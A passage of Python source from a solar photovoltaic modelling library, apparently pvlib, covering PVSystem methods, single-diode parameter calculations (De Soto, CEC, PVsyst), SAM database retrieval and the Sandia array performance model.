return sapm_spectral_loss(airmass_absolute, self.module_parameters)
def sapm_effective_irradiance(self, poa_direct, poa_diffuse,
airmass_absolute, aoi,
reference_irradiance=1000):
"""
Use the :py:func:`sapm_effective_irradiance` function, the input
parameters, and ``self.module_parameters`` to calculate
effective irradiance.
Parameters
----------
poa_direct : numeric
The direct irradiance incident upon the module. [W/m2]
poa_diffuse : numeric
The diffuse irradiance incident on module. [W/m2]
airmass_absolute : numeric
Absolute airmass. [unitless]
aoi : numeric
Angle of incidence. [degrees]
Returns
-------
effective_irradiance : numeric
The SAPM effective irradiance. [W/m2]
"""
return sapm_effective_irradiance(
poa_direct, poa_diffuse, airmass_absolute, aoi,
self.module_parameters)
def pvsyst_celltemp(self, poa_global, temp_air, wind_speed=1.0):
"""Uses :py:func:`temperature.pvsyst_cell` to calculate cell
temperature.
Parameters
----------
poa_global : numeric
Total incident irradiance in W/m^2.
temp_air : numeric
Ambient dry bulb temperature in degrees C.
wind_speed : numeric, default 1.0
Wind speed in m/s measured at the same height for which the wind
loss factor was determined. The default value is 1.0, which is
the wind speed at module height used to determine NOCT.
Returns
-------
numeric, values in degrees C.
"""
kwargs = _build_kwargs(['eta_m', 'alpha_absorption'],
self.module_parameters)
kwargs.update(_build_kwargs(['u_c', 'u_v'],
self.temperature_model_parameters))
return temperature.pvsyst_cell(poa_global, temp_air, wind_speed,
**kwargs)
def faiman_celltemp(self, poa_global, temp_air, wind_speed=1.0):
"""
Use :py:func:`temperature.faiman` to calculate cell temperature.
Parameters
----------
poa_global : numeric
Total incident irradiance [W/m^2].
temp_air : numeric
Ambient dry bulb temperature [C].
wind_speed : numeric, default 1.0
Wind speed in m/s measured at the same height for which the wind
loss factor was determined. The default value 1.0 m/s is the wind
speed at module height used to determine NOCT. [m/s]
Returns
-------
numeric, values in degrees C.
"""
kwargs = _build_kwargs(['u0', 'u1'],
self.temperature_model_parameters)
return temperature.faiman(poa_global, temp_air, wind_speed,
**kwargs)
def fuentes_celltemp(self, poa_global, temp_air, wind_speed):
"""
Use :py:func:`temperature.fuentes` to calculate cell temperature.
Parameters
----------
poa_global : pandas Series
Total incident irradiance [W/m^2]
temp_air : pandas Series
Ambient dry bulb temperature [C]
wind_speed : pandas Series
Wind speed [m/s]
Returns
-------
temperature_cell : pandas Series
The modeled cell temperature [C]
Notes
-----
The Fuentes thermal model uses the module surface tilt for convection
modeling. The SAM implementation of PVWatts hardcodes the surface tilt
value at 30 degrees, ignoring whatever value is used for irradiance
transposition. This method defaults to using ``self.surface_tilt``, but
if you want to match the PVWatts behavior, you can override it by
including a ``surface_tilt`` value in ``temperature_model_parameters``.
"""
# default to using the PVSystem attribute, but allow user to
# override with a custom surface_tilt value
kwargs = {'surface_tilt': self.surface_tilt}
temp_model_kwargs = _build_kwargs([
'noct_installed', 'module_height', 'wind_height', 'emissivity',
'absorption', 'surface_tilt', 'module_width', 'module_length'],
self.temperature_model_parameters)
kwargs.update(temp_model_kwargs)
return temperature.fuentes(poa_global, temp_air, wind_speed,
**kwargs)
def first_solar_spectral_loss(self, pw, airmass_absolute):
"""
Use the :py:func:`first_solar_spectral_correction` function to
calculate the spectral loss modifier. The model coefficients are
specific to the module's cell type, and are determined by searching
for one of the following keys in self.module_parameters (in order):
- 'first_solar_spectral_coefficients' (user-supplied coefficients)
- 'Technology' - a string describing the cell type, can be read from
the CEC module parameter database
- 'Material' - a string describing the cell type, can be read from
the Sandia module database.
Parameters
----------
pw : array-like
atmospheric precipitable water (cm).
airmass_absolute : array-like
absolute (pressure corrected) airmass.
Returns
-------
modifier: array-like
spectral mismatch factor (unitless) which can be multiplied
with broadband irradiance reaching a module's cells to estimate
effective irradiance, i.e., the irradiance that is converted to
electrical current.
"""
if 'first_solar_spectral_coefficients' in \
self.module_parameters.keys():
coefficients = \
self.module_parameters['first_solar_spectral_coefficients']
module_type = None
else:
module_type = self._infer_cell_type()
coefficients = None
return atmosphere.first_solar_spectral_correction(pw,
airmass_absolute,
module_type,
coefficients)
def _infer_cell_type(self):
"""
Examines module_parameters and maps the Technology key for the CEC
database and the Material key for the Sandia database to a common
list of strings for cell type.
Returns
-------
cell_type: str
"""
_cell_type_dict = {'Multi-c-Si': 'multisi',
'Mono-c-Si': 'monosi',
'Thin Film': 'cigs',
'a-Si/nc': 'asi',
'CIS': 'cigs',
'CIGS': 'cigs',
'1-a-Si': 'asi',
'CdTe': 'cdte',
'a-Si': 'asi',
'2-a-Si': None,
'3-a-Si': None,
'HIT-Si': 'monosi',
'mc-Si': 'multisi',
'c-Si': 'multisi',
'Si-Film': 'asi',
'EFG mc-Si': 'multisi',
'GaAs': None,
'a-Si / mono-Si': 'monosi'}
if 'Technology' in self.module_parameters.keys():
# CEC module parameter set
cell_type = _cell_type_dict[self.module_parameters['Technology']]
elif 'Material' in self.module_parameters.keys():
# Sandia module parameter set
cell_type = _cell_type_dict[self.module_parameters['Material']]
else:
cell_type = None
return cell_type
def singlediode(self, photocurrent, saturation_current,
resistance_series, resistance_shunt, nNsVth,
ivcurve_pnts=None):
"""Wrapper around the :py:func:`pvlib.pvsystem.singlediode` function.
See :py:func:`pvsystem.singlediode` for details
"""
return singlediode(photocurrent, saturation_current,
resistance_series, resistance_shunt, nNsVth,
ivcurve_pnts=ivcurve_pnts)
def i_from_v(self, resistance_shunt, resistance_series, nNsVth, voltage,
saturation_current, photocurrent):
"""Wrapper around the :py:func:`pvlib.pvsystem.i_from_v` function.
See :py:func:`pvsystem.i_from_v` for details
"""
return i_from_v(resistance_shunt, resistance_series, nNsVth, voltage,
saturation_current, photocurrent)
# inverter now specified by self.inverter_parameters
def snlinverter(self, v_dc, p_dc):
"""Uses :py:func:`pvlib.inverter.sandia` to calculate AC power based on
``self.inverter_parameters`` and the input voltage and power.
See :py:func:`pvlib.inverter.sandia` for details
"""
return inverter.sandia(v_dc, p_dc, self.inverter_parameters)
def adrinverter(self, v_dc, p_dc):
"""Uses :py:func:`pvlib.inverter.adr` to calculate AC power based on
``self.inverter_parameters`` and the input voltage and power.
See :py:func:`pvlib.inverter.adr` for details
"""
return inverter.adr(v_dc, p_dc, self.inverter_parameters)
def scale_voltage_current_power(self, data):
"""
Scales the voltage, current, and power of the `data` DataFrame
by `self.modules_per_string` and `self.strings_per_inverter`.
Parameters
----------
data: DataFrame
Must contain columns `'v_mp', 'v_oc', 'i_mp' ,'i_x', 'i_xx',
'i_sc', 'p_mp'`.
Returns
-------
scaled_data: DataFrame
A scaled copy of the input data.
"""
return scale_voltage_current_power(data,
voltage=self.modules_per_string,
current=self.strings_per_inverter)
def pvwatts_dc(self, g_poa_effective, temp_cell):
"""
Calcuates DC power according to the PVWatts model using
:py:func:`pvlib.pvsystem.pvwatts_dc`, `self.module_parameters['pdc0']`,
and `self.module_parameters['gamma_pdc']`.
See :py:func:`pvlib.pvsystem.pvwatts_dc` for details.
"""
kwargs = _build_kwargs(['temp_ref'], self.module_parameters)
return pvwatts_dc(g_poa_effective, temp_cell,
self.module_parameters['pdc0'],
self.module_parameters['gamma_pdc'],
**kwargs)
def pvwatts_losses(self):
"""
Calculates DC power losses according the PVwatts model using
:py:func:`pvlib.pvsystem.pvwatts_losses` and
``self.losses_parameters``.
See :py:func:`pvlib.pvsystem.pvwatts_losses` for details.
"""
kwargs = _build_kwargs(['soiling', 'shading', 'snow', 'mismatch',
'wiring', 'connections', 'lid',
'nameplate_rating', 'age', 'availability'],
self.losses_parameters)
return pvwatts_losses(**kwargs)
def pvwatts_ac(self, pdc):
"""
Calculates AC power according to the PVWatts model using
:py:func:`pvlib.inverter.pvwatts`, `self.module_parameters["pdc0"]`,
and `eta_inv_nom=self.inverter_parameters["eta_inv_nom"]`.
See :py:func:`pvlib.inverter.pvwatts` for details.
"""
kwargs = _build_kwargs(['eta_inv_nom', 'eta_inv_ref'],
self.inverter_parameters)
return inverter.pvwatts(pdc, self.inverter_parameters['pdc0'],
**kwargs)
@deprecated('0.8', alternative='PVSystem, Location, and ModelChain',
name='PVSystem.localize', removal='0.9')
def localize(self, location=None, latitude=None, longitude=None,
**kwargs):
"""
Creates a LocalizedPVSystem object using this object
and location data. Must supply either location object or
latitude, longitude, and any location kwargs
Parameters
----------
location : None or Location, default None
latitude : None or float, default None
longitude : None or float, default None
**kwargs : see Location
Returns
-------
localized_system : LocalizedPVSystem
"""
if location is None:
location = Location(latitude, longitude, **kwargs)
return LocalizedPVSystem(pvsystem=self, location=location)
@deprecated('0.8', alternative='PVSystem, Location, and ModelChain',
name='LocalizedPVSystem', removal='0.9')
class LocalizedPVSystem(PVSystem, Location):
"""
The LocalizedPVSystem class defines a standard set of installed PV
system attributes and modeling functions. This class combines the
attributes and methods of the PVSystem and Location classes.
The LocalizedPVSystem may have bugs due to the difficulty of
robustly implementing multiple inheritance. See
:py:class:`~pvlib.modelchain.ModelChain` for an alternative paradigm
for modeling PV systems at specific locations.
"""
def __init__(self, pvsystem=None, location=None, **kwargs):
new_kwargs = _combine_localized_attributes(
pvsystem=pvsystem,
location=location,
**kwargs,
)
PVSystem.__init__(self, **new_kwargs)
Location.__init__(self, **new_kwargs)
def __repr__(self):
attrs = ['name', 'latitude', 'longitude', 'altitude', 'tz',
'surface_tilt', 'surface_azimuth', 'module', 'inverter',
'albedo', 'racking_model', 'module_type',
'temperature_model_parameters']
return ('LocalizedPVSystem:\n ' + '\n '.join(
f'{attr}: {getattr(self, attr)}' for attr in attrs))
def calcparams_desoto(effective_irradiance, temp_cell,
alpha_sc, a_ref, I_L_ref, I_o_ref, R_sh_ref, R_s,
EgRef=1.121, dEgdT=-0.0002677,
irrad_ref=1000, temp_ref=25):
'''
Calculates five parameter values for the single diode equation at
effective irradiance and cell temperature using the De Soto et al.
model described in [1]_. The five values returned by calcparams_desoto
can be used by singlediode to calculate an IV curve.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : numeric
The average cell temperature of cells within a module in C.
alpha_sc : float
The short-circuit current temperature coefficient of the
module in units of A/C.
a_ref : float
The product of the usual diode ideality factor (n, unitless),
number of cells in series (Ns), and cell thermal voltage at reference
conditions, in units of V.
I_L_ref : float
The light-generated current (or photocurrent) at reference conditions,
in amperes.
I_o_ref : float
The dark or diode reverse saturation current at reference conditions,
in amperes.
R_sh_ref : float
The shunt resistance at reference conditions, in ohms.
R_s : float
The series resistance at reference conditions, in ohms.
EgRef : float
The energy bandgap at reference temperature in units of eV.
1.121 eV for crystalline silicon. EgRef must be >0. For parameters
from the SAM CEC module database, EgRef=1.121 is implicit for all
cell types in the parameter estimation algorithm used by NREL.
dEgdT : float
The temperature dependence of the energy bandgap at reference
conditions in units of 1/K. May be either a scalar value
(e.g. -0.0002677 as in [1]_) or a DataFrame (this may be useful if
dEgdT is a modeled as a function of temperature). For parameters from
the SAM CEC module database, dEgdT=-0.0002677 is implicit for all cell
types in the parameter estimation algorithm used by NREL.
irrad_ref : float (optional, default=1000)
Reference irradiance in W/m^2.
temp_ref : float (optional, default=25)
Reference cell temperature in C.
Returns
-------
Tuple of the following results:
photocurrent : numeric
Light-generated current in amperes
saturation_current : numeric
Diode saturation curent in amperes
resistance_series : float
Series resistance in ohms
resistance_shunt : numeric
Shunt resistance in ohms
nNsVth : numeric
The product of the usual diode ideality factor (n, unitless),
number of cells in series (Ns), and cell thermal voltage at
specified effective irradiance and cell temperature.
References
----------
.. [1] W. De Soto et al., "Improvement and validation of a model for
photovoltaic array performance", Solar Energy, vol 80, pp. 78-88,
2006.
.. [2] System Advisor Model web page. https://sam.nrel.gov.
.. [3] A. Dobos, "An Improved Coefficient Calculator for the California
Energy Commission 6 Parameter Photovoltaic Module Model", Journal of
Solar Energy Engineering, vol 134, 2012.
.. [4] O. Madelung, "Semiconductors: Data Handbook, 3rd ed." ISBN
3-540-40488-0
See Also
--------
singlediode
retrieve_sam
Notes
-----
If the reference parameters in the ModuleParameters struct are read
from a database or library of parameters (e.g. System Advisor
Model), it is important to use the same EgRef and dEgdT values that
were used to generate the reference parameters, regardless of the
actual bandgap characteristics of the semiconductor. For example, in
the case of the System Advisor Model library, created as described
in [3], EgRef and dEgdT for all modules were 1.121 and -0.0002677,
respectively.
This table of reference bandgap energies (EgRef), bandgap energy
temperature dependence (dEgdT), and "typical" airmass response (M)
is provided purely as reference to those who may generate their own
reference module parameters (a_ref, IL_ref, I0_ref, etc.) based upon
the various PV semiconductors. Again, we stress the importance of
using identical EgRef and dEgdT when generation reference parameters
and modifying the reference parameters (for irradiance, temperature,
and airmass) per DeSoto's equations.
Crystalline Silicon (Si):
* EgRef = 1.121
* dEgdT = -0.0002677
>>> M = np.polyval([-1.26E-4, 2.816E-3, -0.024459, 0.086257, 0.9181],
... AMa) # doctest: +SKIP
Source: [1]
Cadmium Telluride (CdTe):
* EgRef = 1.475
* dEgdT = -0.0003
>>> M = np.polyval([-2.46E-5, 9.607E-4, -0.0134, 0.0716, 0.9196],
... AMa) # doctest: +SKIP
Source: [4]
Copper Indium diSelenide (CIS):
* EgRef = 1.010
* dEgdT = -0.00011
>>> M = np.polyval([-3.74E-5, 0.00125, -0.01462, 0.0718, 0.9210],
... AMa) # doctest: +SKIP
Source: [4]
Copper Indium Gallium diSelenide (CIGS):
* EgRef = 1.15
* dEgdT = ????
>>> M = np.polyval([-9.07E-5, 0.0022, -0.0202, 0.0652, 0.9417],
... AMa) # doctest: +SKIP
Source: Wikipedia
Gallium Arsenide (GaAs):
* EgRef = 1.424
* dEgdT = -0.000433
* M = unknown
Source: [4]
'''
# Boltzmann constant in eV/K
k = 8.617332478e-05
# reference temperature
Tref_K = temp_ref + 273.15
Tcell_K = temp_cell + 273.15
E_g = EgRef * (1 + dEgdT*(Tcell_K - Tref_K))
nNsVth = a_ref * (Tcell_K / Tref_K)
# In the equation for IL, the single factor effective_irradiance is
# used, in place of the product S*M in [1]. effective_irradiance is
# equivalent to the product of S (irradiance reaching a module's cells) *
# M (spectral adjustment factor) as described in [1].
IL = effective_irradiance / irrad_ref * \
(I_L_ref + alpha_sc * (Tcell_K - Tref_K))
I0 = (I_o_ref * ((Tcell_K / Tref_K) ** 3) *
(np.exp(EgRef / (k*(Tref_K)) - (E_g / (k*(Tcell_K))))))
# Note that the equation for Rsh differs from [1]. In [1] Rsh is given as
# Rsh = Rsh_ref * (S_ref / S) where S is broadband irradiance reaching
# the module's cells. If desired this model behavior can be duplicated
# by applying reflection and soiling losses to broadband plane of array
# irradiance and not applying a spectral loss modifier, i.e.,
# spectral_modifier = 1.0.
# use errstate to silence divide by warning
with np.errstate(divide='ignore'):
Rsh = R_sh_ref * (irrad_ref / effective_irradiance)
Rs = R_s
return IL, I0, Rs, Rsh, nNsVth
def calcparams_cec(effective_irradiance, temp_cell,
alpha_sc, a_ref, I_L_ref, I_o_ref, R_sh_ref, R_s,
Adjust, EgRef=1.121, dEgdT=-0.0002677,
irrad_ref=1000, temp_ref=25):
'''
Calculates five parameter values for the single diode equation at
effective irradiance and cell temperature using the CEC
model. The CEC model [1]_ differs from the De soto et al.
model [3]_ by the parameter Adjust. The five values returned by
calcparams_cec can be used by singlediode to calculate an IV curve.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : numeric
The average cell temperature of cells within a module in C.
alpha_sc : float
The short-circuit current temperature coefficient of the
module in units of A/C.
a_ref : float
The product of the usual diode ideality factor (n, unitless),
number of cells in series (Ns), and cell thermal voltage at reference
conditions, in units of V.
I_L_ref : float
The light-generated current (or photocurrent) at reference conditions,
in amperes.
I_o_ref : float
The dark or diode reverse saturation current at reference conditions,
in amperes.
R_sh_ref : float
The shunt resistance at reference conditions, in ohms.
R_s : float
The series resistance at reference conditions, in ohms.
Adjust : float
The adjustment to the temperature coefficient for short circuit
current, in percent
EgRef : float
The energy bandgap at reference temperature in units of eV.
1.121 eV for crystalline silicon. EgRef must be >0. For parameters
from the SAM CEC module database, EgRef=1.121 is implicit for all
cell types in the parameter estimation algorithm used by NREL.
dEgdT : float
The temperature dependence of the energy bandgap at reference
conditions in units of 1/K. May be either a scalar value
(e.g. -0.0002677 as in [3]) or a DataFrame (this may be useful if
dEgdT is a modeled as a function of temperature). For parameters from
the SAM CEC module database, dEgdT=-0.0002677 is implicit for all cell
types in the parameter estimation algorithm used by NREL.
irrad_ref : float (optional, default=1000)
Reference irradiance in W/m^2.
temp_ref : float (optional, default=25)
Reference cell temperature in C.
Returns
-------
Tuple of the following results:
photocurrent : numeric
Light-generated current in amperes
saturation_current : numeric
Diode saturation curent in amperes
resistance_series : float
Series resistance in ohms
resistance_shunt : numeric
Shunt resistance in ohms
nNsVth : numeric
The product of the usual diode ideality factor (n, unitless),
number of cells in series (Ns), and cell thermal voltage at
specified effective irradiance and cell temperature.
References
----------
.. [1] A. Dobos, "An Improved Coefficient Calculator for the California
Energy Commission 6 Parameter Photovoltaic Module Model", Journal of
Solar Energy Engineering, vol 134, 2012.
.. [2] System Advisor Model web page. https://sam.nrel.gov.
.. [3] W. De Soto et al., "Improvement and validation of a model for
photovoltaic array performance", Solar Energy, vol 80, pp. 78-88,
2006.
See Also
--------
calcparams_desoto
singlediode
retrieve_sam
'''
# pass adjusted temperature coefficient to desoto
return calcparams_desoto(effective_irradiance, temp_cell,
alpha_sc*(1.0 - Adjust/100),
a_ref, I_L_ref, I_o_ref,
R_sh_ref, R_s,
EgRef=1.121, dEgdT=-0.0002677,
irrad_ref=1000, temp_ref=25)
def calcparams_pvsyst(effective_irradiance, temp_cell,
alpha_sc, gamma_ref, mu_gamma,
I_L_ref, I_o_ref,
R_sh_ref, R_sh_0, R_s,
cells_in_series,
R_sh_exp=5.5,
EgRef=1.121,
irrad_ref=1000, temp_ref=25):
'''
Calculates five parameter values for the single diode equation at
effective irradiance and cell temperature using the PVsyst v6
model. The PVsyst v6 model is described in [1]_, [2]_, [3]_.
The five values returned by calcparams_pvsyst can be used by singlediode
to calculate an IV curve.
Parameters
----------
effective_irradiance : numeric
The irradiance (W/m2) that is converted to photocurrent.
temp_cell : numeric
The average cell temperature of cells within a module in C.
alpha_sc : float
The short-circuit current temperature coefficient of the
module in units of A/C.
gamma_ref : float
The diode ideality factor
mu_gamma : float
The temperature coefficient for the diode ideality factor, 1/K
I_L_ref : float
The light-generated current (or photocurrent) at reference conditions,
in amperes.
I_o_ref : float
The dark or diode reverse saturation current at reference conditions,
in amperes.
R_sh_ref : float
The shunt resistance at reference conditions, in ohms.
R_sh_0 : float
The shunt resistance at zero irradiance conditions, in ohms.
R_s : float
The series resistance at reference conditions, in ohms.
cells_in_series : integer
The number of cells connected in series.
R_sh_exp : float
The exponent in the equation for shunt resistance, unitless. Defaults
to 5.5.
EgRef : float
The energy bandgap at reference temperature in units of eV.
1.121 eV for crystalline silicon. EgRef must be >0.
irrad_ref : float (optional, default=1000)
Reference irradiance in W/m^2.
temp_ref : float (optional, default=25)
Reference cell temperature in C.
Returns
-------
Tuple of the following results:
photocurrent : numeric
Light-generated current in amperes
saturation_current : numeric
Diode saturation current in amperes
resistance_series : float
Series resistance in ohms
resistance_shunt : numeric
Shunt resistance in ohms
nNsVth : numeric
The product of the usual diode ideality factor (n, unitless),
number of cells in series (Ns), and cell thermal voltage at
specified effective irradiance and cell temperature.
References
----------
.. [1] K. Sauer, T. Roessler, C. W. Hansen, Modeling the Irradiance and
Temperature Dependence of Photovoltaic Modules in PVsyst,
IEEE Journal of Photovoltaics v5(1), January 2015.
.. [2] A. Mermoud, PV modules modelling, Presentation at the 2nd PV
Performance Modeling Workshop, Santa Clara, CA, May 2013
.. [3] A. Mermoud, T. Lejeune, Performance Assessment of a Simulation Model
for PV modules of any available technology, 25th European Photovoltaic
Solar Energy Conference, Valencia, Spain, Sept. 2010
See Also
--------
calcparams_desoto
singlediode
'''
# Boltzmann constant in J/K
k = 1.38064852e-23
# elementary charge in coulomb
q = 1.6021766e-19
# reference temperature
Tref_K = temp_ref + 273.15
Tcell_K = temp_cell + 273.15
gamma = gamma_ref + mu_gamma * (Tcell_K - Tref_K)
nNsVth = gamma * k / q * cells_in_series * Tcell_K
IL = effective_irradiance / irrad_ref * \
(I_L_ref + alpha_sc * (Tcell_K - Tref_K))
I0 = I_o_ref * ((Tcell_K / Tref_K) ** 3) * \
(np.exp((q * EgRef) / (k * gamma) * (1 / Tref_K - 1 / Tcell_K)))
Rsh_tmp = \
(R_sh_ref - R_sh_0 * np.exp(-R_sh_exp)) / (1.0 - np.exp(-R_sh_exp))
Rsh_base = np.maximum(0.0, Rsh_tmp)
Rsh = Rsh_base + (R_sh_0 - Rsh_base) * \
np.exp(-R_sh_exp * effective_irradiance / irrad_ref)
Rs = R_s
return IL, I0, Rs, Rsh, nNsVth
def retrieve_sam(name=None, path=None):
'''
Retrieve latest module and inverter info from a local file or the
SAM website.
This function will retrieve either:
* CEC module database
* Sandia Module database
* CEC Inverter database
* Anton Driesse Inverter database
and return it as a pandas DataFrame.
Parameters
----------
name : None or string, default None
Name can be one of:
* 'CECMod' - returns the CEC module database
* 'CECInverter' - returns the CEC Inverter database
* 'SandiaInverter' - returns the CEC Inverter database
(CEC is only current inverter db available; tag kept for
backwards compatibility)
* 'SandiaMod' - returns the Sandia Module database
* 'ADRInverter' - returns the ADR Inverter database
path : None or string, default None
Path to the SAM file. May also be a URL.
Returns
-------
samfile : DataFrame
A DataFrame containing all the elements of the desired database.
Each column represents a module or inverter, and a specific
dataset can be retrieved by the command
Raises
------
ValueError
If no name or path is provided.
Notes
-----
Files available at
https://github.com/NREL/SAM/tree/develop/deploy/libraries
Documentation for module and inverter data sets:
https://sam.nrel.gov/photovoltaic/pv-sub-page-2.html
Examples
--------
>>> from pvlib import pvsystem
>>> invdb = pvsystem.retrieve_sam('CECInverter')
>>> inverter = invdb.AE_Solar_Energy__AE6_0__277V__277V__CEC_2012_
>>> inverter
Vac 277.000000
Paco 6000.000000
Pdco 6165.670000
Vdco 361.123000
Pso 36.792300
C0 -0.000002
C1 -0.000047
C2 -0.001861
C3 0.000721
Pnt 0.070000
Vdcmax 600.000000
Idcmax 32.000000
Mppt_low 200.000000
Mppt_high 500.000000
Name: AE_Solar_Energy__AE6_0__277V__277V__CEC_2012_, dtype: float64
'''
if name is not None:
name = name.lower()
data_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'data')
if name == 'cecmod':
csvdata = os.path.join(
data_path, 'sam-library-cec-modules-2019-03-05.csv')
elif name == 'sandiamod':
csvdata = os.path.join(
data_path, 'sam-library-sandia-modules-2015-6-30.csv')
elif name == 'adrinverter':
csvdata = os.path.join(data_path, 'adr-library-2013-10-01.csv')
elif name in ['cecinverter', 'sandiainverter']:
# Allowing either, to provide for old code,
# while aligning with current expectations
csvdata = os.path.join(
data_path, 'sam-library-cec-inverters-2019-03-05.csv')
else:
raise ValueError(f'invalid name {name}')
elif path is not None:
if path.startswith('http'):
response = urlopen(path)
csvdata = io.StringIO(response.read().decode(errors='ignore'))
else:
csvdata = path
elif name is None and path is None:
raise ValueError("A name or path must be provided!")
return _parse_raw_sam_df(csvdata)
def _normalize_sam_product_names(names):
'''
Replace special characters within the product names to make them more
suitable for use as Dataframe column names.
'''
# Contributed by Anton Driesse (@adriesse), PV Performance Labs. July, 2019
import warnings
BAD_CHARS = ' -.()[]:+/",'
GOOD_CHARS = '____________'
mapping = str.maketrans(BAD_CHARS, GOOD_CHARS)
names = pd.Series(data=names)
norm_names = names.str.translate(mapping)
n_duplicates = names.duplicated().sum()
if n_duplicates > 0:
warnings.warn('Original names contain %d duplicate(s).' % n_duplicates)
n_duplicates = norm_names.duplicated().sum()
if n_duplicates > 0:
warnings.warn(
'Normalized names contain %d duplicate(s).' % n_duplicates)
return norm_names.values
def _parse_raw_sam_df(csvdata):
df = pd.read_csv(csvdata, index_col=0, skiprows=[1, 2])
df.columns = df.columns.str.replace(' ', '_')
df.index = _normalize_sam_product_names(df.index)
df = df.transpose()
if 'ADRCoefficients' in df.index:
ad_ce = 'ADRCoefficients'
# for each inverter, parses a string of coefficients like
# ' 1.33, 2.11, 3.12' into a list containing floats:
# [1.33, 2.11, 3.12]
df.loc[ad_ce] = df.loc[ad_ce].map(lambda x: list(
map(float, x.strip(' []').split())))
return df
def sapm(effective_irradiance, temp_cell, module):
'''
The Sandia PV Array Performance Model (SAPM) generates 5 points on a
PV module's I-V curve (Voc, Isc, Ix, Ixx, Vmp/Imp) according to
SAND2004-3535. Assumes a reference cell temperature of 25 C.
Parameters
----------
effective_irradiance : numeric
Irradiance reaching the module's cells, after reflections and
adjustment for spectrum. [W/m2]
temp_cell : numeric
Cell temperature [C].
module : dict-like
A dict or Series defining the SAPM parameters. See the notes section
for more details.
Returns
-------
A DataFrame with the columns:
* i_sc : Short-circuit current (A)
* i_mp : Current at the maximum-power point (A)
* v_oc : Open-circuit voltage (V)
* v_mp : Voltage at maximum-power point (V)
* p_mp : Power at maximum-power point (W)
* i_x : Current at module V = 0.5Voc, defines 4th point on I-V
curve for modeling curve shape
* i_xx : Current at module V = 0.5(Voc+Vmp), defines 5th point on
I-V curve for modeling curve shape
Notes
-----
The SAPM parameters which are required in ``module`` are
listed in the following table.
The Sandia module database contains parameter values for a limited set
of modules. The CEC module database does not contain these parameters.
Both databases can be accessed using :py:func:`retrieve_sam`.
================ ========================================================
Key Description
================ ========================================================
A0-A4 The airmass coefficients used in calculating
effective irradiance
B0-B5 The angle of incidence coefficients used in calculating
effective irradiance
C0-C7 The empirically determined coefficients relating
Imp, Vmp, Ix, and Ixx to effective irradiance
Isco Short circuit current at reference condition (amps)
Impo Maximum power current at reference condition (amps)
Voco Open circuit voltage at reference condition (amps)
Vmpo Maximum power voltage at reference condition (amps)
Aisc Short circuit current temperature coefficient at
reference condition (1/C)
Aimp Maximum power current temperature coefficient at
reference condition (1/C)
Bvoco Open circuit voltage temperature coefficient at
reference condition (V/C)
Mbvoc Coefficient providing the irradiance dependence for the
BetaVoc temperature coefficient at reference irradiance
(V/C)
Bvmpo Maximum power voltage temperature coefficient at
reference condition
Mbvmp Coefficient providing the irradiance dependence for the
BetaVmp temperature coefficient at reference irradiance
(V/C)
N Empirically determined "diode factor" (dimensionless)
Cells_in_Series Number of cells in series in a module's cell string(s)
IXO Ix at reference conditions
IXXO Ixx at reference conditions
FD Fraction of diffuse irradiance used by module
================ ========================================================
References
----------
.. [1] King, D. et al, 2004, "Sandia Photovoltaic Array Performance
Model", SAND Report 3535, Sandia National Laboratories, Albuquerque,
NM.
See Also
--------
retrieve_sam
pvlib.temperature.sapm_cell
pvlib.temperature.sapm_module
'''
# TODO: someday, change temp_ref and irrad_ref to reference_temperature and
# reference_irradiance and expose
temp_ref = 25
irrad_ref = 1000
q = 1.60218e-19 # Elementary charge in units of coulombs
kb = 1.38066e-23 # Boltzmann's constant in units of J/K
# avoid problem with integer input
Ee = np.array(effective_irradiance, dtype='float64') / irrad_ref
# set up masking for 0, positive, and nan inputs
Ee_gt_0 = np.full_like(Ee, False, dtype='bool')
Ee_eq_0 = np.full_like(Ee, False, dtype='bool')
notnan = ~np.isnan(Ee)
np.greater(Ee, 0, where=notnan, out=Ee_gt_0)
np.equal(Ee, 0, where=notnan, out=Ee_eq_0)
Bvmpo = module['Bvmpo'] + module['Mbvmp']*(1 - Ee)
Bvoco = module['Bvoco'] + module['Mbvoc']*(1 - Ee)
delta = module['N'] * kb * (temp_cell + 273.15) / q
# avoid repeated computation
logEe = np.full_like(Ee, np.nan)
np.log(Ee, where=Ee_gt_0, out=logEe)
logEe = np.where(Ee_eq_0, -np.inf, logEe)
# avoid repeated __getitem__
cells_in_series = module['Cells_in_Series']
out = OrderedDict()
out['i_sc'] = (
module['Isco'] * Ee * (1 + module['Aisc']*(temp_cell - temp_ref)))
out['i_mp'] = (
module['Impo'] * (module['C0']*Ee + module['C1']*(Ee**2)) *
(1 + module['Aimp']*(temp_cell - temp_ref)))
out['v_oc'] = np.maximum(0, (
module['Voco'] + cells_in_series * delta * logEe +
Bvoco*(temp_cell - temp_ref)))
out['v_mp'] = np.maximum(0, (
module['Vmpo'] +
module['C2'] * cells_in_series * delta * logEe +
module['C3'] * cells_in_series * ((delta * logEe) ** 2) +
Bvmpo*(temp_cell - temp_ref)))
out['p_mp'] = out['i_mp'] * out['v_mp']
out['i_x'] = (
module['IXO'] * (module['C4']*Ee + module['C5']*(Ee**2)) *
(1 + module['Aisc']*(temp_cell - temp_ref)))
# the Ixx calculation in King 2004 has a typo (mixes up Aisc and Aimp)
out['i_xx'] = (
module['IXXO'] * (module['C6']*Ee + module['C7']*(Ee**2)) *
(1 + module['Aisc']*(temp_cell - temp_ref)))
if isinstance(out['i_sc'], pd.Series):
out = pd.DataFrame(out)
return out
def sapm_spectral_loss(airmass_absolute, module):
"""
Calculates the SAPM spectral loss coefficient, F1.
Parameters
----------
airmass_absolute : numeric
Absolute airmass
module : dict-like
A dict, Series, or DataFrame defining the SAPM performance
parameters. See the :py:func:`sapm` notes section for more
details.
Returns
-------
F1 : numeric
The SAPM spectral loss coefficient.
Notes
-----
nan airmass values will result in 0 output.
"""
am_coeff = [module['A4'], module['A3'], module['A2'], module['A1'],
module['A0']]
spectral_loss = np.polyval(am_coeff, airmass_absolute)
spectral_loss = np.where(np.isnan(spectral_loss), 0, spectral_loss)
spectral_loss = np.maximum(0, spectral_loss)
if isinstance(airmass_absolute, pd.Series):
spectral_loss = pd.Series(spectral_loss, airmass_absolute.index)
return spectral_loss
def sapm_effective_irradiance(poa_direct, poa_diffuse, airmass_absolute, aoi,
module):
r"""
Calculates the SAPM effective irradiance using the SAPM spectral
loss and SAPM angle of incidence loss functions.
Parameters
----------
poa_direct : numeric
The direct irradiance incident upon the module. [W/m2]
poa_diffuse : numeric
